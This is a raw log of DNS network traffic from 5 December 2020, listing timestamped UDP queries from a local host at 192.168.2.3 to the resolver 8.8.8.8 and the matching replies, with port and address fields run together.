                                                                                                                                                  Dec 5, 2020 08:43:28.410265923 CET53606338.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:33.014781952 CET6129253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:33.050405025 CET53612928.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:39.265126944 CET6361953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:39.331986904 CET53636198.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:39.912610054 CET6493853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:39.958705902 CET53649388.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:40.636617899 CET6194653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:40.672032118 CET53619468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:41.071295977 CET6491053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:41.106627941 CET53649108.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:41.565464020 CET5212353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:41.600852966 CET53521238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:42.171019077 CET5613053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:42.206612110 CET53561308.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:42.847573996 CET5633853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:42.883097887 CET53563388.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:43.564450026 CET5942053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:43.599741936 CET53594208.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:43.892729998 CET5878453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:43.928317070 CET53587848.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:44.932121038 CET6397853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:44.967658043 CET53639788.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:45.510519981 CET6293853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:45.545907974 CET53629388.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.052850008 CET5570853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.052906036 CET5680353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET53568038.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.448940039 CET5714553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.481640100 CET53557088.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.488394976 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.492825985 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.497859001 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.503201962 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.507247925 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.542771101 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.884772062 CET53571458.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.886359930 CET5535953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.894771099 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.920553923 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.921921015 CET53553598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.924384117 CET5830653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.959666014 CET53583068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:47.464710951 CET6412453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:47.500004053 CET53641248.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.010875940 CET4936153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.046248913 CET53493618.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.114943027 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.118016005 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.121144056 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.124800920 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.467833042 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.469470978 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.470809937 CET6315053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.504851103 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.506387949 CET53631508.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.506843090 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.508157969 CET5327953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.541173935 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.541522980 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.542056084 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.542855978 CET5688153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.557689905 CET5364253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.576889992 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.578296900 CET53568818.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.578788042 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.580691099 CET5566753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.593235016 CET53536428.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.614557981 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.616168976 CET53556678.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.616544008 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.617836952 CET5483353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.654295921 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.654336929 CET53548338.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.654639006 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.656128883 CET6247653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.681833982 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.691803932 CET53624768.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.692184925 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.693607092 CET4970553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.727684975 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.729172945 CET53497058.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.105391026 CET6147753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.141067982 CET53614778.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.510230064 CET5327953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.545767069 CET53532798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.546184063 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.547491074 CET6163353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.582858086 CET53616338.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.651437044 CET5594953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.678586006 CET53559498.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.899038076 CET53532798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.931978941 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.932180882 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.933799028 CET5760153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.967845917 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.969422102 CET53576018.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.971388102 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.973582029 CET4934253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.998538971 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:50.009165049 CET53493428.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:50.183084011 CET5625353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:50.218580008 CET53562538.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:50.730550051 CET4966753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:50.766110897 CET53496678.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:51.276849031 CET5543953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:51.312589884 CET53554398.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:51.823340893 CET5706953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:51.858886957 CET53570698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:52.408591986 CET5765953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:52.444046021 CET53576598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:52.955682993 CET5471753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:52.993534088 CET53547178.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:56.624989986 CET6397553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:56.625580072 CET5663953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:56.660892010 CET53566398.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:56.661736012 CET53639758.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:57.236421108 CET5185653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:57.274240017 CET53518568.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.803669930 CET5654653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.804709911 CET6215253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET53565468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET53621528.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.846127987 CET5347053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.857948065 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.864092112 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.870414019 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.875919104 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET53534708.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.884202003 CET5644653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.885776997 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.899857998 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.910778999 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.919802904 CET53564468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.921621084 CET5963153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.957159996 CET53596318.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:59.448873997 CET5551553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:59.476078987 CET53555158.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:59.980581999 CET6454753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.007798910 CET53645478.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:00.103238106 CET5175953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.130484104 CET53517598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:00.257143021 CET5920753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.284282923 CET53592078.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:00.497203112 CET5426953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.524380922 CET53542698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:00.591161966 CET5485653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.618272066 CET53548568.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.016016006 CET6414053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.051537037 CET53641408.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.558756113 CET6227153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.585874081 CET53622718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.765913963 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.769349098 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.771750927 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.804965973 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.805136919 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.806685925 CET5740453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.807198048 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.807689905 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.810213089 CET6299753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.840622902 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.843271971 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.845679045 CET53629978.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.847259045 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.848738909 CET5771253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.882863045 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.884290934 CET53577128.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.885165930 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.886617899 CET6006553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.922142029 CET53600658.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.922636032 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.922816038 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.923988104 CET5506853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.958138943 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.959275007 CET53550688.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.959923029 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.961081028 CET6470053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.995296001 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.998722076 CET53647008.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.075781107 CET6199853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.102962017 CET53619988.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.258291006 CET53574048.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.258651018 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.260009050 CET5372453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.287118912 CET53537248.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.294251919 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.296370983 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.297508955 CET5232853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.323529005 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.332926989 CET53523288.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.333282948 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.334471941 CET5805153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.360413074 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.370055914 CET53580518.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.371311903 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.373500109 CET6413053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.408910990 CET53641308.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.409029961 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:02.606443882 CET5049153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:02.633642912 CET53504918.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:03.137140989 CET5300453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:03.172971010 CET53530048.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:03.686932087 CET5252953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:03.722223043 CET53525298.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:04.230811119 CET5365653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:04.258011103 CET53536568.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:04.763760090 CET6272453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:04.799576044 CET53627248.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:05.314198017 CET5605953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:05.341470003 CET53560598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:05.840318918 CET6306053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:05.875819921 CET53630608.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:06.373202085 CET5149853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:06.408987999 CET53514988.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:06.904190063 CET5994353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:06.931457043 CET53599438.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:07.454602003 CET5011853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:07.490495920 CET53501188.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:07.996587992 CET5835753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:08.032026052 CET53583578.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:08.543495893 CET5580453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:08.579233885 CET53558048.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:09.090739965 CET5807953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:09.117932081 CET53580798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:09.623686075 CET5208053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:09.650924921 CET53520808.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:10.154020071 CET5523853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:10.189573050 CET53552388.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:10.701011896 CET4928953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:10.736742973 CET53492898.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:11.232388973 CET6103453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:11.259766102 CET53610348.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:11.779169083 CET5196453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:11.814625025 CET53519648.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:12.556914091 CET5824153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:12.592415094 CET53582418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:13.165429115 CET5957153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:13.201133013 CET53595718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:14.356935978 CET5170853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:14.384213924 CET53517088.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:14.888703108 CET6070953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:14.915936947 CET53607098.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:15.421914101 CET6364353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:15.457453966 CET53636438.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:15.970869064 CET6282353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:16.006361961 CET53628238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:16.517447948 CET6375053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:16.544770956 CET53637508.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:17.044955015 CET6195953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:17.072150946 CET53619598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:17.575695992 CET6355453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:17.611612082 CET53635548.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:18.123766899 CET5772353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:18.151106119 CET53577238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:18.669492006 CET5866353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:18.707458019 CET53586638.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:19.217264891 CET5098053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:19.244326115 CET53509808.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:19.749089956 CET5006753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:19.776283979 CET53500678.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:20.296304941 CET5299253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:20.331681013 CET53529928.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:20.842305899 CET5512953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:20.869514942 CET53551298.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:21.357323885 CET6095953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:21.384578943 CET53609598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:21.890527010 CET5831953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:21.917773962 CET53583198.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:22.444001913 CET6478553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:22.479697943 CET53647858.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:22.983156919 CET5020853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:23.010308027 CET53502088.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:23.502736092 CET6247753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:23.538587093 CET53624778.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:24.046238899 CET5446753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:24.081728935 CET53544678.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:24.591864109 CET6054853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:24.627392054 CET53605488.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:25.124499083 CET5962353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:25.151590109 CET53596238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:25.670666933 CET5168953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:25.699100018 CET53516898.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:26.218074083 CET6480653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:26.253832102 CET53648068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:26.543859005 CET4968653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:26.579519033 CET53496868.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:26.749294996 CET5619553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:26.776443005 CET53561958.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:26.993132114 CET6224153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:27.028892040 CET53622418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:27.264238119 CET5054353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:27.299865007 CET53505438.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:27.561621904 CET4968653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:27.597405910 CET53496868.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:27.796911001 CET5644553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:27.832472086 CET53564458.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:27.997512102 CET6224153192.168.2.38.8.8.8
